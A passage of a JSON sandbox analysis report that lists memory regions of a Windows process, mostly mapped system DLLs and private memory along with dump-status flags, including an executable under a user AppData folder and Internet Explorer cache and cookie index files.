38469632, "type": "region", "version": 1 }, "end_va": 39518207, "entry_point": 0, "filename": null, "id": "region_2709", "name": "private_0x00000000024b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38469632, "timestamp": "00:02:03.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1979097087, "entry_point": 1966211072, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_2710", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:02:05.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1980104704, "type": "region", "version": 1 }, "end_va": 1980153855, "entry_point": 1980104704, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2711", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1980104704, "timestamp": "00:02:06.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982136320, "type": "region", "version": 1 }, "end_va": 1983303679, "entry_point": 1982136320, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2712", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982136320, "timestamp": "00:02:06.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1980694528, "type": "region", "version": 1 }, "end_va": 1981698047, "entry_point": 1980694528, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_2713", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1980694528, "timestamp": "00:02:06.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1987379200, "type": "region", "version": 1 }, "end_va": 1988648959, "entry_point": 1987379200, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_2714", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1987379200, "timestamp": "00:02:06.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1990766591, "entry_point": 1988689920, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_2715", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:02:06.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1956577280, "type": "region", "version": 1 }, "end_va": 1956622335, "entry_point": 1956577280, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_2716", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1956577280, "timestamp": "00:02:06.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1956642816, "type": "region", "version": 1 }, "end_va": 1956737023, "entry_point": 1956642816, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_2717", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1956642816, "timestamp": "00:02:06.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956564991, "entry_point": 1956511744, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2718", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:02:06.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_2719", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:02:06.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 35192831, "entry_point": 0, "filename": null, "id": "region_2720", "name": "private_0x0000000002150000", "norm_filename": null, "region_type": "private_memory", "start_va": 34930688, "timestamp": "00:02:06.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 36503551, "entry_point": 0, "filename": null, "id": "region_2721", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:02:06.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2722", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:02:06.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3661823, "entry_point": 3545248, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe", "id": "region_2723", "name": "systeminfo.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:02:06.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34930687, "entry_point": 0, "filename": null, "id": "region_2724", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:02:13.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 37158911, "entry_point": 0, "filename": null, "id": "region_2725", "name": "private_0x0000000002330000", "norm_filename": null, "region_type": "private_memory", "start_va": 36896768, "timestamp": "00:02:13.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 38207487, "entry_point": 0, "filename": null, "id": "region_2726", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:02:13.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 41943039, "entry_point": 0, "filename": null, "id": "region_2727", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:02:13.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956315136, "type": "region", "version": 1 }, "end_va": 1956405247, "entry_point": 1956315136, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2728", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956315136, "timestamp": "00:02:13.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2729", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:02:13.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2730", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:02:13.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3784703, "entry_point": 3538944, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2731", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:02:13.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3784703, "entry_point": 3543693, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2732", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:02:13.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1956052992, "type": "region", "version": 1 }, "end_va": 1956294655, "entry_point": 1956057741, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2736", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1956052992, "timestamp": "00:02:13.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_2737", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:02:14.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3559423, "entry_point": 0, "filename": null, "id": "region_2738", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:02:14.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2969599, "entry_point": 0, "filename": null, "id": "region_2739", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:02:14.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_2770", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:02:14.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1954349056, "type": "region", "version": 1 }, "end_va": 1956044799, "entry_point": 1954349056, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_2771", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1954349056, "timestamp": "00:02:14.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3543039, "entry_point": 3538944, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_2772", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:02:14.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3612671, "entry_point": 0, "filename": null, "id": "region_2773", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:02:14.530", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3588095, "entry_point": 3538944, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_2774", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:02:14.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3702783, "entry_point": 3670016, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_2775", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 3670016, "timestamp": "00:02:14.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 3735552, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_2776", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3735552, "timestamp": "00:02:14.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954152448, "type": "region", "version": 1 }, "end_va": 1954287615, "entry_point": 1954152448, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_2777", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954152448, "timestamp": "00:02:14.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1962147840, "type": "region", "version": 1 }, "end_va": 1962430463, "entry_point": 1962147840, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_2778", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1962147840, "timestamp": "00:02:14.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1990983680, "type": "region", "version": 1 }, "end_va": 1991200767, "entry_point": 1990983680, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2779", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1990983680, "timestamp": "00:02:14.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1996095488, "type": "region", "version": 1 }, "end_va": 1996120063, "entry_point": 1996095488, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2780", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1996095488, "timestamp": "00:02:14.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 851968, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_2781", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:02:14.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954103295, "entry_point": 1953824768, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_2782", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:02:14.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1769472, "start_va": 41943040, "type": "region", "version": 1 }, "end_va": 43712511, "entry_point": 0, "filename": null, "id": "region_2783", "name": "private_0x0000000002800000", "norm_filename": null, "region_type": "private_memory", "start_va": 41943040, "timestamp": "00:02:14.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1953693696, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953693696, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_2784", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1953693696, "timestamp": "00:02:14.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1953628160, "type": "region", "version": 1 }, "end_va": 1953656831, "entry_point": 1953628160, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_2785", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1953628160, "timestamp": "00:02:14.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1958883327, "entry_point": 1958871040, "filename": "\\Windows\\SysWOW64\\normaliz.dll", "id": "region_2786", "name": "normaliz.dll", "norm_filename": "c:\\windows\\syswow64\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:02:14.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1953234944, "type": "region", "version": 1 }, "end_va": 1953570815, "entry_point": 1953234944, "filename": "\\Windows\\SysWOW64\\rasapi32.dll", "id": "region_2787", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\syswow64\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1953234944, "timestamp": "00:02:14.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1953103872, "type": "region", "version": 1 }, "end_va": 1953189887, "entry_point": 1953103872, "filename": "\\Windows\\SysWOW64\\rasman.dll", "id": "region_2788", "name": "rasman.dll", "norm_filename": "c:\\windows\\syswow64\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1953103872, "timestamp": "00:02:14.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1953038336, "type": "region", "version": 1 }, "end_va": 1953091583, "entry_point": 1953038336, "filename": "\\Windows\\SysWOW64\\rtutils.dll", "id": "region_2789", "name": "rtutils.dll", "norm_filename": "c:\\windows\\syswow64\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1953038336, "timestamp": "00:02:14.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3805183, "entry_point": 0, "filename": null, "id": "region_2790", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:02:14.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40042495, "entry_point": 0, "filename": null, "id": "region_2791", "name": "private_0x00000000025f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39780352, "timestamp": "00:02:14.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_2792", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:02:14.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2793", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:02:14.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3805183, "entry_point": 0, "filename": null, "id": "region_2794", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:02:14.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1952972800, "type": "region", "version": 1 }, "end_va": 1952997375, "entry_point": 1952972800, "filename": "\\Windows\\SysWOW64\\SensApi.dll", "id": "region_2795", "name": "sensapi.dll", "norm_filename": "c:\\windows\\syswow64\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1952972800, "timestamp": "00:02:14.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40108032, "type": "region", "version": 1 }, "end_va": 40370175, "entry_point": 0, "filename": null, "id": "region_2796", "name": "private_0x0000000002640000", "norm_filename": null, "region_type": "private_memory", "start_va": 40108032, "timestamp": "00:02:14.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44892160, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_2797", "name": "private_0x0000000002ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44892160, "timestamp": "00:02:14.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_2798", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:02:14.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1952907264, "type": "region", "version": 1 }, "end_va": 1952972799, "entry_point": 1952907264, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_2799", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1952907264, "timestamp": "00:02:14.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1572864, "start_va": 45940736, "type": "region", "version": 1 }, "end_va": 47513599, "entry_point": 0, "filename": null, "id": "region_2800", "name": "private_0x0000000002bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45940736, "timestamp": "00:02:14.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 589824, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_2801", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": 